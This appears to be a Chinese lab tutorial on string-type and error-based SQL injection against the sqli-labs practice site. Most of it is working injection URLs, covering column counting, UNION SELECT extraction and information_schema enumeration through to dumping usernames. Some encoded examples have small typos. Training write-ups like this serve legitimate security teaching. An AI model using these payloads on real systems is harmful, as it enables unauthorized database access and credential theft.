SQL注入字符型报错注入

一、预备知识

1. SQL注入基础知识
2. SQL语句基础知识

二、实验目的

学习SQL注入之字符型注入。

三、实验工具

火狐浏览器(hackbar插件)

四、实验环境

1. Windows Server 2003
2. 网址www.any.com/sqli/Less-1/?id=1

五、实验步骤

第一步:访问

http://www.any.com/sqli/Less-1/?id=1 #页面正常

在这里插入图片描述

第二步:加入单引号,访问

http://www.any.com/sqli/Less-1/?id=1' #会报错

在这里插入图片描述

第三步:判断列数。(通过二分法)

1)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=1 

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=1 %23

在这里插入图片描述

3)输入:

http://www.any.com/sqli/Less-1/?id=1' and 1=2 %23

在这里插入图片描述

4)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by%2010%23 #等价于 http://www.any.com/sqli/Less-1/?id=1' order by 10 %23

提示 Unknown column '10' in 'order clause',说明小于10列。

在这里插入图片描述

5)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by205%23 #等价于 http://www.any.com/sqli/Less-1/?id=1' order by 5 %23

提示 Unknown column '5' in 'order clause',说明小于5列。

在这里插入图片描述

6)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by203%23 #等价于 http://www.any.com/sqli/Less-1/?id=1 order by 3 %23

页面正常,说明大于等于3列。

在这里插入图片描述

7)输入:

http://www.any.com/sqli/Less-1/?id=1%27%20order%20by204%23 #等价于 http://www.any.com/sqli/Less-1/?id=1 order by 4 %23

提示 Unknown column '4' in 'order clause',说明小于4列,结合上面的可以确定有3列。

在这里插入图片描述

第四步:查看显错点

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 11,22,33 %23

显错点在第二个和第三个位置。

在这里插入图片描述

第五步:查看用户信息、数据库名称、MySQL版本信息

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 11,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),33 %23

在这里插入图片描述

第六步:查看 security 数据库中所有表

http://www.any.com/sqli/Less-1/?id=1' and 1=2 union select 1,2,unhex(hex(group_concat(table_name))) from information_schema.tables where table_schema='security' %23

得到所有的表:emailsreferersuagentsusers

在这里插入图片描述

第七步:查看 users 表中所有列

http://www.any.com/sqli/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' %23

得到所有的列:idusernamepassword

在这里插入图片描述

第八步:查看所有列的值

1)输入:

http://www.any.com/sqli/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 0,1),0x3e,floor(rand()*2))a from information_schema.tables group by a%23

出现如下界面,表示输入的内容没有问题:

在这里插入图片描述

多次点击 Execute 按钮(或者直接刷新浏览器),会出现如下界面:

在这里插入图片描述

2)输入:

http://www.any.com/sqli/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 1,1),0x3e,floor(rand()*2))a from information_schema.tables group by a%23

出现如下界面,表示输入的内容没有问题:

在这里插入图片描述

多次点击 Excute 按钮刷新(或者直接刷新浏览器),会出现如下界面:

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值